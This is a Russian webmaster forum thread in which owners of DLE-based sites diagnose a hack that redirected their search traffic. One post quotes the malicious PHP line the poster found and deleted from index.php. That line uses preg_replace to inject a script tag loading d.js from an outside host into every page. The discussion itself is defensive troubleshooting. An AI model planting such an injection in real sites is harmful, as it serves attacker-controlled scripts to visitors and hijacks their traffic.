Сегодня посещаемость упала на 70%
Страницы: Пред. 1 2 3 4 5 ... 8 След.
Сегодня посещаемость упала на 70%, Сегодня посещаемость в Яндексе упала на 70%
Скачайте себе на винт весь сайт, чтоб позже способ взлома определить. И выкладывайте бакап, если время критично
Редирект обычно суют на сайты с malware, например в доменной зоне .osa.pl Я знаю что говорю.
Цитата
hebroid пишет:
Редирект обычно суют на сайты с malware, например в доменной зоне .osa.pl Я знаю что говорю.
Без претензий к вашей компетентности, просто с воровством трафа не сталкивался и любопытны подробности, А что такое malware?
хм такая же ситуация и у меня smile:mad: нука как с ней бороться то?
malware перевёл - вредоносное ПО, имеется в виду тупо шелл что ли?
daden11, Malware - вирус, подгружающийся через интернет, с целью хищения личных данных с вашего ПК.

С зараженного сайта. например через ява скрипт.
Изменено: hebroid - 3 Июля 2011 00:02
вот на этом сайте http://www.virusnasaite.ru/check.php проверил два своих сайта и тот который взломан показал что может быть вирус
Цитата
hebroid пишет:
daden11 , Malware - вирус, подгружающийся через интернет, с целью хищения личных данных с вашего ПК.
С зараженного сайта. например через ява скрипт.
Вообще, вроде их троянами звали.
При переходе на сайт TEJlO11 с Гугла и Яндекса происходит редирект на shara.searchlots-all.ru
daden11, от названия суть не меняется. Редиректить могут не только на сайты с вирусами, но и на сайты конкурентов, либо в других целях.
Цитата
hebroid пишет:
При переходе на сайт TEJlO11 с Гугла и Яндекса происходит редирект на shara.searchlots-all.ru

у меня на тот же сайт перекидывало, в index.php в самом низу нашел код видущий на другой сайт. Удалил и проблема решилась
вот такой код был в индексе echo $tpl->result['main'] = preg_replace('~(<body.*?>)~ism','$1<sc ript src=http://promediagroup.ru/d.js></script>', $tpl->result['main']); интересно как они его залили мне на сайт?
Изменено: wabex - 3 Июля 2011 00:14
Цитата
wabex пишет:
у меня на тот же сайт перекидывало, в index.php в самом низу нашел код видущий на другой сайт. Удалил и проблема решилась
какой движок то? на старых дле так часто ломали, там в index.php вроде фрейм какойто добавлялся. ставил себе права на него 444, вроде после этого такая проблема не беспокоила.
Цитата
wabex пишет:
вот такой код был в индексе echo $tpl->result['main'] = preg_replace('~(<body.*?>)~ism','$1<sc ript src=http://promediagroup.ru/d.js></script>', $tpl->result['main']); интересно как они его залили мне на сайт?
Да уже скажите какой движок то?
dle8.5 wwerwer smile:rolleyes:
бр бр бр
Страницы: Пред. 1 2 3 4 5 ... 8 След.
Похожие темы:
Читают тему (гостей: 1, пользователей: 0, из них скрытых: 0)
Новые темыОбъявленияСвободное общение
08:36 Обновления интерфейса яндекс метрики 
18:34 Webvork - международная товарная СРА сеть с сертифицированными офферами на Европу. 
15:35 Влияние ссылок буржнете 
15:13 Рапида умерла. Куда выводить с AdSense? 
15:05 Чем заменили ТИЦ? 
15:01 Profit Pixels - In-House Форекс, Крипто, Трейдинг CPA Офферы | Еженедельные Выплаты | CPA до $950 
11:45 Bropush - твой бро в монетизации сайта push-уведомлениями 
15:34 «Взрываем языковые преграды» – переводим любые тексты 
15:31 Доходные сайты под бурж 
15:06 Вечные ссылки с ТОПОВЫХ ресурсов! Размещение вечных трастовых ссылок с тИЦ от + 1000 до +45000 
14:20 Куплю аккаунт Habr.com 
13:31 Платим за реги на форумах и досках, дорого. 
12:59 ProxyWins.com - 15% по промо-коду "venividivici" 
12:07 Продам аккаунт на хабр фриланс 
02:58 Точные прогнозы на футбол 
00:17 Суд постановил заблокировать Telegram 
23:26 150+ хакерских поисковых систем и инструментов 
22:05 Курс доллара упал ниже 85 рублей 
19:31 Таксистам из "Яндекс Go" стало очень выгодно занижать рейтинг всем пассажирам 
13:37 Тренды заработка 2024-2025 
12:58 Чем отличаются прокси?